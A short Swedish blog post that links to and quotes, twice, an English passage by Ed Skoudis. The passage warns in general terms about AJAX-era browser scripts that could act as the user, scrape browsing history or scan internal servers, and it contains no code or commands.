Den här artiken skrivaer Ed Skoudis om hoten med Asynchronous JavaScript and XML (AJAX). Följande stycke är speciellt intressant:
"A script, running in the browser, can do anything you can do on that site: bid on an auction, buy stuff or expand your buddy list to include unsavory people... But it gets worse. The script could scrape your browser history... ..., and in turn forward the information back to the attacker. The script could also use the browser to start scanning other Web servers, perhaps even those inside of your corporation's firewall...
... So in a nutshell, an attacker can use the browser to wield bot-like control of a victim's machine. Sure, there are restrictions on what scripts can do in a browser. They can't directly access any file in the file system or run arbitrary programs on the machine, for example, but clever researchers are finding ways to either dodge those restrictions or live within them to achieve powerful controls."
Ed varnar för detta hot i framtiden och menar att det är idé att hålla ett öga på en här trenden. Hela artikeln.
"A script, running in the browser, can do anything you can do on that site: bid on an auction, buy stuff or expand your buddy list to include unsavory people... But it gets worse. The script could scrape your browser history... ..., and in turn forward the information back to the attacker. The script could also use the browser to start scanning other Web servers, perhaps even those inside of your corporation's firewall...
... So in a nutshell, an attacker can use the browser to wield bot-like control of a victim's machine. Sure, there are restrictions on what scripts can do in a browser. They can't directly access any file in the file system or run arbitrary programs on the machine, for example, but clever researchers are finding ways to either dodge those restrictions or live within them to achieve powerful controls."
Ed varnar för detta hot i framtiden och menar att det är idé att hålla ett öga på en här trenden. Hela artikeln.
Inga kommentarer:
Skicka en kommentar